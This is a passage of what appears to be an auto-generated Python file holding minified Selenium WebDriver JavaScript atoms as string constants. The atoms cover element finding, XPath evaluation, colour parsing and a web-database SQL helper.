"g,\"\")}),e=c.length-5;if(0>e||c.indexOf(\"Error\",e)!=e)c+=\"Error\";t"\
"his.name=c;c=Error(this.message);c.name=this.name;this.stack=c.stack||"\
"\"\"}(function(){var a=Error;function b(){}b.prototype=a.prototype;f.a="\
"a.prototype;f.prototype=new b})();\nvar h=\"unknown error\",g={15:\"ele"\
"ment not selectable\",11:\"element not visible\",31:\"ime engine activa"\
"tion failed\",30:\"ime not available\",24:\"invalid cookie domain\",29:"\
"\"invalid element coordinates\",12:\"invalid element state\",32:\"inval"\
"id selector\",51:\"invalid selector\",52:\"invalid selector\",17:\"java"\
"script error\",405:\"unsupported operation\",34:\"move target out of bo"\
"unds\",27:\"no such alert\",7:\"no such element\",8:\"no such frame\",2"\
"3:\"no such window\",28:\"script timeout\",33:\"session not created\",1"\
"0:\"stale element reference\",\n0:\"success\",21:\"timeout\",25:\"unabl"\
"e to set cookie\",26:\"unexpected alert open\"};g[13]=h;g[9]=\"unknown "\
"command\";f.prototype.toString=function(){return this.name+\": \"+this."\
"message};function k(a){this.rows=[];for(var b=0;b<a.rows.length;b++)thi"\
"s.rows[b]=a.rows.item(b);this.rowsAffected=a.rowsAffected;this.insertId"\
"=-1;try{this.insertId=a.insertId}catch(c){}};function l(a,b,c,e,q,s,t){"\
"function u(a,b){var c=new k(b);e(a,c)}var n;try{n=d.openDatabase(a,\"\""\
",a+\"name\",5242880)}catch(v){throw new f(13,v.message);}n.transaction("\
"function(a){a.executeSql(b,c,u,t)},q,s)}var m=[\"_\"],p=this;m[0]in p||"\
"!p.execScript||p.execScript(\"var \"+m[0]);for(var r;m.length&&(r=m.shi"\
"ft());)m.length||void 0===l?p=p[r]?p[r]:p[r]={}:p[r]=l;; return this._."\
"apply(null,arguments);}.apply({navigator:typeof window!=undefined?windo"\
"w.navigator:null,document:typeof window!=undefined?window.document:null"\
"}, arguments);}"
FIND_ELEMENT = \
"function(){return function(){function h(a){return function(){return a}}"\
"var k=this;\nfunction aa(a){var b=typeof a;if(\"object\"==b)if(a){if(a "\
"instanceof Array)return\"array\";if(a instanceof Object)return b;var c="\
"Object.prototype.toString.call(a);if(\"[object Window]\"==c)return\"obj"\
"ect\";if(\"[object Array]\"==c||\"number\"==typeof a.length&&\"undefine"\
"d\"!=typeof a.splice&&\"undefined\"!=typeof a.propertyIsEnumerable&&!a."\
"propertyIsEnumerable(\"splice\"))return\"array\";if(\"[object Function]"\
"\"==c||\"undefined\"!=typeof a.call&&\"undefined\"!=typeof a.propertyIs"\
"Enumerable&&!a.propertyIsEnumerable(\"call\"))return\"function\"}else r"\
"eturn\"null\";\nelse if(\"function\"==b&&\"undefined\"==typeof a.call)r"\
"eturn\"object\";return b}function l(a){return\"string\"==typeof a}funct"\
"ion n(a){return\"function\"==aa(a)};var ba=window;function ca(a){var b="\
"a.length-1;return 0<=b&&a.indexOf(\" \",b)==b}function p(a){return a.re"\
"place(/^[\\s\\xa0]+|[\\s\\xa0]+$/g,\"\")}function da(a){return String(a"\
").replace(/\\-([a-z])/g,function(a,c){return c.toUpperCase()})};var ea="\
"Array.prototype;function r(a,b){for(var c=a.length,d=l(a)?a.split(\"\")"\
":a,e=0;e<c;e++)e in d&&b.call(void 0,d[e],e,a)}function s(a,b){for(var "\
"c=a.length,d=[],e=0,f=l(a)?a.split(\"\"):a,g=0;g<c;g++)if(g in f){var q"\
"=f[g];b.call(void 0,q,g,a)&&(d[e++]=q)}return d}function fa(a,b){if(a.r"\
"educe)return a.reduce(b,\"\");var c=\"\";r(a,function(d,e){c=b.call(voi"\
"d 0,c,d,e,a)});return c}function ga(a,b){for(var c=a.length,d=l(a)?a.sp"\
"lit(\"\"):a,e=0;e<c;e++)if(e in d&&b.call(void 0,d[e],e,a))return!0;ret"\
"urn!1}\nfunction ha(a,b){var c;a:{c=a.length;for(var d=l(a)?a.split(\""\
"\"):a,e=0;e<c;e++)if(e in d&&b.call(void 0,d[e],e,a)){c=e;break a}c=-1}"\
"return 0>c?null:l(a)?a.charAt(c):a[c]}function t(a,b){var c;a:if(l(a))c"\
"=l(b)&&1==b.length?a.indexOf(b,0):-1;else{for(c=0;c<a.length;c++)if(c i"\
"n a&&a[c]===b)break a;c=-1}return 0<=c}function ia(a,b,c){return 2>=arg"\
"uments.length?ea.slice.call(a,b):ea.slice.call(a,b,c)};var ja;function "\
"u(a,b){this.x=void 0!==a?a:0;this.y=void 0!==b?b:0}u.prototype.toString"\
"=function(){return\"(\"+this.x+\", \"+this.y+\")\"};u.prototype.ceil=fu"\
"nction(){this.x=Math.ceil(this.x);this.y=Math.ceil(this.y);return this}"\
";u.prototype.floor=function(){this.x=Math.floor(this.x);this.y=Math.flo"\
"or(this.y);return this};u.prototype.round=function(){this.x=Math.round("\
"this.x);this.y=Math.round(this.y);return this};function v(a,b){this.wid"\
"th=a;this.height=b}v.prototype.toString=function(){return\"(\"+this.wid"\
"th+\" x \"+this.height+\")\"};v.prototype.ceil=function(){this.width=Ma"\
"th.ceil(this.width);this.height=Math.ceil(this.height);return this};v.p"\
"rototype.floor=function(){this.width=Math.floor(this.width);this.height"\
"=Math.floor(this.height);return this};v.prototype.round=function(){this"\
".width=Math.round(this.width);this.height=Math.round(this.height);retur"\
"n this};var ka=3;function w(a){return a?new la(x(a)):ja||(ja=new la)}fu"\
"nction ma(a){for(;a&&1!=a.nodeType;)a=a.previousSibling;return a}functi"\
"on y(a,b){if(a.contains&&1==b.nodeType)return a==b||a.contains(b);if(\""\
"undefined\"!=typeof a.compareDocumentPosition)return a==b||Boolean(a.co"\
"mpareDocumentPosition(b)&16);for(;b&&a!=b;)b=b.parentNode;return b==a}"\
"\nfunction na(a,b){if(a==b)return 0;if(a.compareDocumentPosition)return"\
" a.compareDocumentPosition(b)&2?1:-1;if(\"sourceIndex\"in a||a.parentNo"\
"de&&\"sourceIndex\"in a.parentNode){var c=1==a.nodeType,d=1==b.nodeType"\
";if(c&&d)return a.sourceIndex-b.sourceIndex;var e=a.parentNode,f=b.pare"\
"ntNode;return e==f?oa(a,b):!c&&y(e,b)?-1*pa(a,b):!d&&y(f,a)?pa(b,a):(c?"\
"a.sourceIndex:e.sourceIndex)-(d?b.sourceIndex:f.sourceIndex)}d=x(a);c=d"\
".createRange();c.selectNode(a);c.collapse(!0);d=d.createRange();d.selec"\
"tNode(b);d.collapse(!0);\nreturn c.compareBoundaryPoints(k.Range.START_"\
"TO_END,d)}function pa(a,b){var c=a.parentNode;if(c==b)return-1;for(var "\
"d=b;d.parentNode!=c;)d=d.parentNode;return oa(d,a)}function oa(a,b){for"\
"(var c=b;c=c.previousSibling;)if(c==a)return-1;return 1}function x(a){r"\
"eturn 9==a.nodeType?a:a.ownerDocument||a.document}function qa(a,b){a=a."\
"parentNode;for(var c=0;a;){if(b(a))return a;a=a.parentNode;c++}return n"\
"ull}function la(a){this.j=a||k.document||document}\nfunction z(a,b,c,d)"\
"{a=d||a.j;b=b&&\"*\"!=b?b.toUpperCase():\"\";if(a.querySelectorAll&&a.q"\
"uerySelector&&(b||c))c=a.querySelectorAll(b+(c?\".\"+c:\"\"));else if(c"\
"&&a.getElementsByClassName)if(a=a.getElementsByClassName(c),b){d={};for"\
"(var e=0,f=0,g;g=a[f];f++)b==g.nodeName&&(d[e++]=g);d.length=e;c=d}else"\
" c=a;else if(a=a.getElementsByTagName(b||\"*\"),c){d={};for(f=e=0;g=a[f"\
"];f++)b=g.className,\"function\"==typeof b.split&&t(b.split(/\\s+/),c)&"\
"&(d[e++]=g);d.length=e;c=d}else c=a;return c}\nfunction ra(a){var b=a.j"\
";a=b.body;b=b.parentWindow||b.defaultView;return new u(b.pageXOffset||a"\
".scrollLeft,b.pageYOffset||a.scrollTop)}la.prototype.contains=y;var A={"\
"n:function(a){return!(!a.querySelectorAll||!a.querySelector)},c:functio"\
"n(a,b){if(!a)throw Error(\"No class name specified\");a=p(a);if(1<a.spl"\
"it(/\\s+/).length)throw Error(\"Compound class names not permitted\");i"\
"f(A.n(b))return b.querySelector(\".\"+a.replace(/\\./g,\"\\\\.\"))||nul"\
"l;var c=z(w(b),\"*\",a,b);return c.length?c[0]:null},d:function(a,b){if"\
"(!a)throw Error(\"No class name specified\");a=p(a);if(1<a.split(/\\s+/"\
").length)throw Error(\"Compound class names not permitted\");return A.n"\
"(b)?b.querySelectorAll(\".\"+\na.replace(/\\./g,\"\\\\.\")):z(w(b),\"*"\
"\",a,b)}};var C={c:function(a,b){n(b.querySelector);if(!a)throw Error("\
"\"No selector specified\");a=p(a);var c=b.querySelector(a);return c&&1="\
"=c.nodeType?c:null},d:function(a,b){n(b.querySelectorAll);if(!a)throw E"\
"rror(\"No selector specified\");a=p(a);return b.querySelectorAll(a)}};v"\
"ar sa={aliceblue:\"#f0f8ff\",antiquewhite:\"#faebd7\",aqua:\"#00ffff\","\
"aquamarine:\"#7fffd4\",azure:\"#f0ffff\",beige:\"#f5f5dc\",bisque:\"#ff"\
"e4c4\",black:\"#000000\",blanchedalmond:\"#ffebcd\",blue:\"#0000ff\",bl"\
"ueviolet:\"#8a2be2\",brown:\"#a52a2a\",burlywood:\"#deb887\",cadetblue:"\
"\"#5f9ea0\",chartreuse:\"#7fff00\",chocolate:\"#d2691e\",coral:\"#ff7f5"\
"0\",cornflowerblue:\"#6495ed\",cornsilk:\"#fff8dc\",crimson:\"#dc143c\""\
",cyan:\"#00ffff\",darkblue:\"#00008b\",darkcyan:\"#008b8b\",darkgoldenr"\
"od:\"#b8860b\",darkgray:\"#a9a9a9\",darkgreen:\"#006400\",\ndarkgrey:\""\
"#a9a9a9\",darkkhaki:\"#bdb76b\",darkmagenta:\"#8b008b\",darkolivegreen:"\
"\"#556b2f\",darkorange:\"#ff8c00\",darkorchid:\"#9932cc\",darkred:\"#8b"\
"0000\",darksalmon:\"#e9967a\",darkseagreen:\"#8fbc8f\",darkslateblue:\""\
"#483d8b\",darkslategray:\"#2f4f4f\",darkslategrey:\"#2f4f4f\",darkturqu"\
"oise:\"#00ced1\",darkviolet:\"#9400d3\",deeppink:\"#ff1493\",deepskyblu"\
"e:\"#00bfff\",dimgray:\"#696969\",dimgrey:\"#696969\",dodgerblue:\"#1e9"\
"0ff\",firebrick:\"#b22222\",floralwhite:\"#fffaf0\",forestgreen:\"#228b"\
"22\",fuchsia:\"#ff00ff\",gainsboro:\"#dcdcdc\",\nghostwhite:\"#f8f8ff\""\
",gold:\"#ffd700\",goldenrod:\"#daa520\",gray:\"#808080\",green:\"#00800"\
"0\",greenyellow:\"#adff2f\",grey:\"#808080\",honeydew:\"#f0fff0\",hotpi"\
"nk:\"#ff69b4\",indianred:\"#cd5c5c\",indigo:\"#4b0082\",ivory:\"#fffff0"\
"\",khaki:\"#f0e68c\",lavender:\"#e6e6fa\",lavenderblush:\"#fff0f5\",law"\
"ngreen:\"#7cfc00\",lemonchiffon:\"#fffacd\",lightblue:\"#add8e6\",light"\
"coral:\"#f08080\",lightcyan:\"#e0ffff\",lightgoldenrodyellow:\"#fafad2"\
"\",lightgray:\"#d3d3d3\",lightgreen:\"#90ee90\",lightgrey:\"#d3d3d3\",l"\
"ightpink:\"#ffb6c1\",lightsalmon:\"#ffa07a\",\nlightseagreen:\"#20b2aa"\
"\",lightskyblue:\"#87cefa\",lightslategray:\"#778899\",lightslategrey:"\
"\"#778899\",lightsteelblue:\"#b0c4de\",lightyellow:\"#ffffe0\",lime:\"#"\
"00ff00\",limegreen:\"#32cd32\",linen:\"#faf0e6\",magenta:\"#ff00ff\",ma"\
"roon:\"#800000\",mediumaquamarine:\"#66cdaa\",mediumblue:\"#0000cd\",me"\
"diumorchid:\"#ba55d3\",mediumpurple:\"#9370db\",mediumseagreen:\"#3cb37"\
"1\",mediumslateblue:\"#7b68ee\",mediumspringgreen:\"#00fa9a\",mediumtur"\
"quoise:\"#48d1cc\",mediumvioletred:\"#c71585\",midnightblue:\"#191970\""\
",mintcream:\"#f5fffa\",mistyrose:\"#ffe4e1\",\nmoccasin:\"#ffe4b5\",nav"\
"ajowhite:\"#ffdead\",navy:\"#000080\",oldlace:\"#fdf5e6\",olive:\"#8080"\
"00\",olivedrab:\"#6b8e23\",orange:\"#ffa500\",orangered:\"#ff4500\",orc"\
"hid:\"#da70d6\",palegoldenrod:\"#eee8aa\",palegreen:\"#98fb98\",paletur"\
"quoise:\"#afeeee\",palevioletred:\"#db7093\",papayawhip:\"#ffefd5\",pea"\
"chpuff:\"#ffdab9\",peru:\"#cd853f\",pink:\"#ffc0cb\",plum:\"#dda0dd\",p"\
"owderblue:\"#b0e0e6\",purple:\"#800080\",red:\"#ff0000\",rosybrown:\"#b"\
"c8f8f\",royalblue:\"#4169e1\",saddlebrown:\"#8b4513\",salmon:\"#fa8072"\
"\",sandybrown:\"#f4a460\",seagreen:\"#2e8b57\",\nseashell:\"#fff5ee\",s"\
"ienna:\"#a0522d\",silver:\"#c0c0c0\",skyblue:\"#87ceeb\",slateblue:\"#6"\
"a5acd\",slategray:\"#708090\",slategrey:\"#708090\",snow:\"#fffafa\",sp"\
"ringgreen:\"#00ff7f\",steelblue:\"#4682b4\",tan:\"#d2b48c\",teal:\"#008"\
"080\",thistle:\"#d8bfd8\",tomato:\"#ff6347\",turquoise:\"#40e0d0\",viol"\
"et:\"#ee82ee\",wheat:\"#f5deb3\",white:\"#ffffff\",whitesmoke:\"#f5f5f5"\
"\",yellow:\"#ffff00\",yellowgreen:\"#9acd32\"};var ta=\"background-colo"\
"r border-top-color border-right-color border-bottom-color border-left-c"\
"olor color outline-color\".split(\" \"),ua=/#([0-9a-fA-F])([0-9a-fA-F])"\
"([0-9a-fA-F])/;function va(a){if(!wa.test(a))throw Error(\"'\"+a+\"' is"\
" not a valid hex color\");4==a.length&&(a=a.replace(ua,\"#$1$1$2$2$3$3"\
"\"));return a.toLowerCase()}var wa=/^#(?:[0-9a-f]{3}){1,2}$/i,xa=/^(?:r"\
"gba)?\\((\\d{1,3}),\\s?(\\d{1,3}),\\s?(\\d{1,3}),\\s?(0|1|0\\.\\d*)\\)$"\
"/i;\nfunction ya(a){var b=a.match(xa);if(b){a=Number(b[1]);var c=Number"\
"(b[2]),d=Number(b[3]),b=Number(b[4]);if(0<=a&&255>=a&&0<=c&&255>=c&&0<="\
"d&&255>=d&&0<=b&&1>=b)return[a,c,d,b]}return[]}var za=/^(?:rgb)?\\((0|["\
"1-9]\\d{0,2}),\\s?(0|[1-9]\\d{0,2}),\\s?(0|[1-9]\\d{0,2})\\)$/i;functio"\
"n Aa(a){var b=a.match(za);if(b){a=Number(b[1]);var c=Number(b[2]),b=Num"\
"ber(b[3]);if(0<=a&&255>=a&&0<=c&&255>=c&&0<=b&&255>=b)return[a,c,b]}ret"\
"urn[]};function D(a,b){this.code=a;this.state=Ba[a]||Ca;this.message=b|"\
"|\"\";var c=this.state.replace(/((?:^|\\s+)[a-z])/g,function(a){return "\
"a.toUpperCase().replace(/^[\\s\\xa0]+/g,\"\")}),d=c.length-5;if(0>d||c."\
"indexOf(\"Error\",d)!=d)c+=\"Error\";this.name=c;c=Error(this.message);"\
"c.name=this.name;this.stack=c.stack||\"\"}(function(){var a=Error;funct"\
"ion b(){}b.prototype=a.prototype;D.P=a.prototype;D.prototype=new b})();"\
"\nvar Ca=\"unknown error\",Ba={15:\"element not selectable\",11:\"eleme"\
"nt not visible\",31:\"ime engine activation failed\",30:\"ime not avail"\
"able\",24:\"invalid cookie domain\",29:\"invalid element coordinates\","\
"12:\"invalid element state\",32:\"invalid selector\",51:\"invalid selec"\
"tor\",52:\"invalid selector\",17:\"javascript error\",405:\"unsupported"\
" operation\",34:\"move target out of bounds\",27:\"no such alert\",7:\""\
"no such element\",8:\"no such frame\",23:\"no such window\",28:\"script"\
" timeout\",33:\"session not created\",10:\"stale element reference\",\n"\
"0:\"success\",21:\"timeout\",25:\"unable to set cookie\",26:\"unexpecte"\
"d alert open\"};Ba[13]=Ca;Ba[9]=\"unknown command\";D.prototype.toStrin"\
"g=function(){return this.name+\": \"+this.message};function E(a){var b="\
"null,c=a.nodeType;1==c&&(b=a.textContent,b=void 0==b||null==b?a.innerTe"\
"xt:b,b=void 0==b||null==b?\"\":b);if(\"string\"!=typeof b)if(9==c||1==c"\
"){a=9==c?a.documentElement:a.firstChild;for(var c=0,d=[],b=\"\";a;){do "\
"1!=a.nodeType&&(b+=a.nodeValue),d[c++]=a;while(a=a.firstChild);for(;c&&"\
"!(a=d[--c].nextSibling););}}else b=a.nodeValue;return\"\"+b}\nfunction "\
"F(a,b,c){if(null===b)return!0;try{if(!a.getAttribute)return!1}catch(d){"\
"return!1}return null==c?!!a.getAttribute(b):a.getAttribute(b,2)==c}func"\
"tion G(a,b,c,d,e){return Da.call(null,a,b,l(c)?c:null,l(d)?d:null,e||ne"\
"w H)}\nfunction Da(a,b,c,d,e){b.getElementsByName&&d&&\"name\"==c?(b=b."\
"getElementsByName(d),r(b,function(b){a.matches(b)&&e.add(b)})):b.getEle"\
"mentsByClassName&&d&&\"class\"==c?(b=b.getElementsByClassName(d),r(b,fu"\
"nction(b){b.className==d&&a.matches(b)&&e.add(b)})):b.getElementsByTagN"\
"ame&&(b=b.getElementsByTagName(a.getName()),r(b,function(a){F(a,c,d)&&e"\
".add(a)}));return e}function Ea(a,b,c,d,e){for(b=b.firstChild;b;b=b.nex"\
"tSibling)F(b,c,d)&&a.matches(b)&&e.add(b);return e};function H(){this.f"\
"=this.e=null;this.k=0}function Fa(a){this.t=a;this.next=this.m=null}H.p"\
"rototype.unshift=function(a){a=new Fa(a);a.next=this.e;this.f?this.e.m="\
"a:this.e=this.f=a;this.e=a;this.k++};H.prototype.add=function(a){a=new "\
"Fa(a);a.m=this.f;this.e?this.f.next=a:this.e=this.f=a;this.f=a;this.k++"\
"};function Ga(a){return(a=a.e)?a.t:null}function I(a){return new Ha(a,!"\
"1)}function Ha(a,b){this.M=a;this.p=(this.u=b)?a.f:a.e;this.B=null}\nHa"\
".prototype.next=function(){var a=this.p;if(null==a)return null;var b=th"\
"is.B=a;this.p=this.u?a.m:a.next;return b.t};function J(a,b,c,d,e){b=b.e"\
"valuate(d);c=c.evaluate(d);var f;if(b instanceof H&&c instanceof H){e=I"\
"(b);for(d=e.next();d;d=e.next())for(b=I(c),f=b.next();f;f=b.next())if(a"\
"(E(d),E(f)))return!0;return!1}if(b instanceof H||c instanceof H){b inst"\
"anceof H?e=b:(e=c,c=b);e=I(e);b=typeof c;for(d=e.next();d;d=e.next()){s"\
"witch(b){case \"number\":d=+E(d);break;case \"boolean\":d=!!E(d);break;"\
"case \"string\":d=E(d);break;default:throw Error(\"Illegal primitive ty"\
"pe for comparison.\");}if(a(d,c))return!0}return!1}return e?\n\"boolean"\
"\"==typeof b||\"boolean\"==typeof c?a(!!b,!!c):\"number\"==typeof b||\""\
"number\"==typeof c?a(+b,+c):a(b,c):a(+b,+c)}function Ia(a,b,c,d){this.C"\
"=a;this.O=b;this.A=c;this.i=d}Ia.prototype.toString=function(){return t"\
"his.C};var Ja={};function K(a,b,c,d){if(a in Ja)throw Error(\"Binary op"\
"erator already created: \"+a);a=new Ia(a,b,c,d);Ja[a.toString()]=a}K(\""\
"div\",6,1,function(a,b,c){return a.b(c)/b.b(c)});K(\"mod\",6,1,function"\
"(a,b,c){return a.b(c)%b.b(c)});K(\"*\",6,1,function(a,b,c){return a.b(c"\
")*b.b(c)});\nK(\"+\",5,1,function(a,b,c){return a.b(c)+b.b(c)});K(\"-\""\
",5,1,function(a,b,c){return a.b(c)-b.b(c)});K(\"<\",4,2,function(a,b,c)"\
"{return J(function(a,b){return a<b},a,b,c)});K(\">\",4,2,function(a,b,c"\
"){return J(function(a,b){return a>b},a,b,c)});K(\"<=\",4,2,function(a,b"\
",c){return J(function(a,b){return a<=b},a,b,c)});K(\">=\",4,2,function("\
"a,b,c){return J(function(a,b){return a>=b},a,b,c)});K(\"=\",3,2,functio"\
"n(a,b,c){return J(function(a,b){return a==b},a,b,c,!0)});\nK(\"!=\",3,2"\
",function(a,b,c){return J(function(a,b){return a!=b},a,b,c,!0)});K(\"an"\
"d\",2,2,function(a,b,c){return a.h(c)&&b.h(c)});K(\"or\",1,2,function(a"\
",b,c){return a.h(c)||b.h(c)});function Ka(a,b,c,d,e,f,g,q,m){this.l=a;t"\
"his.A=b;this.L=c;this.K=d;this.J=e;this.i=f;this.I=g;this.H=void 0!==q?"\
"q:g;this.N=!!m}Ka.prototype.toString=function(){return this.l};var La={"\
"};function L(a,b,c,d,e,f,g,q){if(a in La)throw Error(\"Function already"\
" created: \"+a+\".\");La[a]=new Ka(a,b,c,d,!1,e,f,g,q)}L(\"boolean\",2,"\
"!1,!1,function(a,b){return b.h(a)},1);L(\"ceiling\",1,!1,!1,function(a,"\
"b){return Math.ceil(b.b(a))},1);\nL(\"concat\",3,!1,!1,function(a,b){va"\
"r c=ia(arguments,1);return fa(c,function(b,c){return b+c.a(a)})},2,null"\
");L(\"contains\",2,!1,!1,function(a,b,c){b=b.a(a);a=c.a(a);return-1!=b."\
"indexOf(a)},2);L(\"count\",1,!1,!1,function(a,b){return b.evaluate(a).k"\
"},1,1,!0);L(\"false\",2,!1,!1,h(!1),0);L(\"floor\",1,!1,!1,function(a,b"\
"){return Math.floor(b.b(a))},1);\nL(\"id\",4,!1,!1,function(a,b){var c="\
"a.g(),d=9==c.nodeType?c:c.ownerDocument,c=b.a(a).split(/\\s+/),e=[];r(c"\
",function(a){(a=d.getElementById(a))&&!t(e,a)&&e.push(a)});e.sort(na);v"\
"ar f=new H;r(e,function(a){f.add(a)});return f},1);L(\"lang\",2,!1,!1,h"\
"(!1),1);L(\"last\",1,!0,!1,function(a){if(1!=arguments.length)throw Err"\
"or(\"Function last expects ()\");return a.F()},0);L(\"local-name\",3,!1"\
",!0,function(a,b){var c=b?Ga(b.evaluate(a)):a.g();return c?c.nodeName.t"\
"oLowerCase():\"\"},0,1,!0);\nL(\"name\",3,!1,!0,function(a,b){var c=b?G"\
"a(b.evaluate(a)):a.g();return c?c.nodeName.toLowerCase():\"\"},0,1,!0);"\
"L(\"namespace-uri\",3,!0,!1,h(\"\"),0,1,!0);L(\"normalize-space\",3,!1,"\
"!0,function(a,b){return(b?b.a(a):E(a.g())).replace(/[\\s\\xa0]+/g,\" \""\
").replace(/^\\s+|\\s+$/g,\"\")},0,1);L(\"not\",2,!1,!1,function(a,b){re"\
"turn!b.h(a)},1);L(\"number\",1,!1,!0,function(a,b){return b?b.b(a):+E(a"\
".g())},0,1);L(\"position\",1,!0,!1,function(a){return a.G()},0);L(\"rou"\
"nd\",1,!1,!1,function(a,b){return Math.round(b.b(a))},1);\nL(\"starts-w"\
"ith\",2,!1,!1,function(a,b,c){b=b.a(a);a=c.a(a);return 0==b.lastIndexOf"\
"(a,0)},2);L(\"string\",3,!1,!0,function(a,b){return b?b.a(a):E(a.g())},"\
"0,1);L(\"string-length\",1,!1,!0,function(a,b){return(b?b.a(a):E(a.g())"\
").length},0,1);\nL(\"substring\",3,!1,!1,function(a,b,c,d){c=c.b(a);if("\
"isNaN(c)||Infinity==c||-Infinity==c)return\"\";d=d?d.b(a):Infinity;if(i"\
"sNaN(d)||-Infinity===d)return\"\";c=Math.round(c)-1;var e=Math.max(c,0)"\
";a=b.a(a);if(Infinity==d)return a.substring(e);b=Math.round(d);return a"\
".substring(e,c+b)},2,3);L(\"substring-after\",3,!1,!1,function(a,b,c){b"\
"=b.a(a);a=c.a(a);c=b.indexOf(a);return-1==c?\"\":b.substring(c+a.length"\
")},2);\nL(\"substring-before\",3,!1,!1,function(a,b,c){b=b.a(a);a=c.a(a"\
");a=b.indexOf(a);return-1==a?\"\":b.substring(0,a)},2);L(\"sum\",1,!1,!"\
"1,function(a,b){for(var c=I(b.evaluate(a)),d=0,e=c.next();e;e=c.next())"\
"d+=+E(e);return d},1,1,!0);L(\"translate\",3,!1,!1,function(a,b,c,d){b="\
"b.a(a);c=c.a(a);var e=d.a(a);a=[];for(d=0;d<c.length;d++){var f=c.charA"\
"t(d);f in a||(a[f]=e.charAt(d))}c=\"\";for(d=0;d<b.length;d++)f=b.charA"\
"t(d),c+=f in a?a[f]:f;return c},3);L(\"true\",2,!1,!1,h(!0),0);function"\
" Ma(a,b,c,d){this.l=a;this.D=b;this.u=c;this.Q=d}Ma.prototype.toString="\
"function(){return this.l};var Na={};function M(a,b,c,d){if(a in Na)thro"\
"w Error(\"Axis already created: \"+a);Na[a]=new Ma(a,b,c,!!d)}M(\"ances"\
"tor\",function(a,b){for(var c=new H,d=b;d=d.parentNode;)a.matches(d)&&c"\
".unshift(d);return c},!0);M(\"ancestor-or-self\",function(a,b){var c=ne"\
"w H,d=b;do a.matches(d)&&c.unshift(d);while(d=d.parentNode);return c},!"\
"0);\nM(\"attribute\",function(a,b){var c=new H,d=a.getName(),e=b.attrib"\
"utes;if(e)if(\"*\"==d)for(var d=0,f;f=e[d];d++)c.add(f);else(f=e.getNam"\
"edItem(d))&&c.add(f);return c},!1);M(\"child\",function(a,b,c,d,e){retu"\
"rn Ea.call(null,a,b,l(c)?c:null,l(d)?d:null,e||new H)},!1,!0);M(\"desce"\
"ndant\",G,!1,!0);M(\"descendant-or-self\",function(a,b,c,d){var e=new H"\
";F(b,c,d)&&a.matches(b)&&e.add(b);return G(a,b,c,d,e)},!1,!0);\nM(\"fol"\
"lowing\",function(a,b,c,d){var e=new H;do for(var f=b;f=f.nextSibling;)"\
"F(f,c,d)&&a.matches(f)&&e.add(f),e=G(a,f,c,d,e);while(b=b.parentNode);r"\
"eturn e},!1,!0);M(\"following-sibling\",function(a,b){for(var c=new H,d"\
"=b;d=d.nextSibling;)a.matches(d)&&c.add(d);return c},!1);M(\"namespace"\
"\",function(){return new H},!1);M(\"parent\",function(a,b){var c=new H;"\
"if(9==b.nodeType)return c;if(2==b.nodeType)return c.add(b.ownerElement)"\
",c;var d=b.parentNode;a.matches(d)&&c.add(d);return c},!1);\nM(\"preced"\
"ing\",function(a,b,c,d){var e=new H,f=[];do f.unshift(b);while(b=b.pare"\
"ntNode);for(var g=1,q=f.length;g<q;g++){var m=[];for(b=f[g];b=b.previou"\
"sSibling;)m.unshift(b);for(var B=0,ab=m.length;B<ab;B++)b=m[B],F(b,c,d)"\
"&&a.matches(b)&&e.add(b),e=G(a,b,c,d,e)}return e},!0,!0);M(\"preceding-"\
"sibling\",function(a,b){for(var c=new H,d=b;d=d.previousSibling;)a.matc"\
"hes(d)&&c.unshift(d);return c},!0);M(\"self\",function(a,b){var c=new H"\
";a.matches(b)&&c.add(b);return c},!1);var N={};N.w=function(){var a={R:"\
"\"http://www.w3.org/2000/svg\"};return function(b){return a[b]||null}}("\
");N.i=function(a,b,c){var d=x(a);try{var e=d.createNSResolver?d.createN"\
"SResolver(d.documentElement):N.w;return d.evaluate(b,a,e,c,null)}catch("\
"f){throw new D(32,\"Unable to locate an element with the xpath expressi"\
"on \"+b+\" because of the following error:\\n\"+f);}};N.o=function(a,b)"\
"{if(!a||1!=a.nodeType)throw new D(32,'The result of the xpath expressio"\
"n \"'+b+'\" is: '+a+\". It should be an element.\");};\nN.c=function(a,"\
"b){var c=function(){var c=N.i(b,a,9);return c?c.singleNodeValue||null:b"\
".selectSingleNode?(c=x(b),c.setProperty&&c.setProperty(\"SelectionLangu"\
"age\",\"XPath\"),b.selectSingleNode(a)):null}();null===c||N.o(c,a);retu"\
"rn c};\nN.d=function(a,b){var c=function(){var c=N.i(b,a,7);if(c){for(v"\
"ar e=c.snapshotLength,f=[],g=0;g<e;++g)f.push(c.snapshotItem(g));return"\
" f}return b.selectNodes?(c=x(b),c.setProperty&&c.setProperty(\"Selectio"\
"nLanguage\",\"XPath\"),b.selectNodes(a)):[]}();r(c,function(b){N.o(b,a)"\
"});return c};function O(a,b,c,d){this.left=a;this.top=b;this.width=c;th"\
"is.height=d}O.prototype.toString=function(){return\"(\"+this.left+\", "\
"\"+this.top+\" - \"+this.width+\"w x \"+this.height+\"h)\"};O.prototype"\
".contains=function(a){return a instanceof O?this.left<=a.left&&this.lef"\
"t+this.width>=a.left+a.width&&this.top<=a.top&&this.top+this.height>=a."\
"top+a.height:a.x>=this.left&&a.x<=this.left+this.width&&a.y>=this.top&&"\
"a.y<=this.top+this.height};\nO.prototype.ceil=function(){this.left=Math"\
".ceil(this.left);this.top=Math.ceil(this.top);this.width=Math.ceil(this"\
".width);this.height=Math.ceil(this.height);return this};O.prototype.flo"\
"or=function(){this.left=Math.floor(this.left);this.top=Math.floor(this."\
"top);this.width=Math.floor(this.width);this.height=Math.floor(this.heig"\
"ht);return this};\nO.prototype.round=function(){this.left=Math.round(th"\
"is.left);this.top=Math.round(this.top);this.width=Math.round(this.width"\
");this.height=Math.round(this.height);return this};function Oa(a,b){var"\
" c=x(a);return c.defaultView&&c.defaultView.getComputedStyle&&(c=c.defa"\
"ultView.getComputedStyle(a,null))?c[b]||c.getPropertyValue(b)||\"\":\""\
"\"}function P(a){return Oa(a,\"position\")||(a.currentStyle?a.currentSt"\
"yle.position:null)||a.style&&a.style.position}function Pa(a){var b;try{"\
"b=a.getBoundingClientRect()}catch(c){return{left:0,top:0,right:0,bottom"\
":0}}return b}\nfunction Qa(a){var b=x(a),c=P(a),d=\"fixed\"==c||\"absol"\
"ute\"==c;for(a=a.parentNode;a&&a!=b;a=a.parentNode)if(c=P(a),d=d&&\"sta"\
"tic\"==c&&a!=b.documentElement&&a!=b.body,!d&&(a.scrollWidth>a.clientWi"\
"dth||a.scrollHeight>a.clientHeight||\"fixed\"==c||\"absolute\"==c||\"re"\
"lative\"==c))return a;return null}\nfunction Ra(a){if(1==a.nodeType){va"\
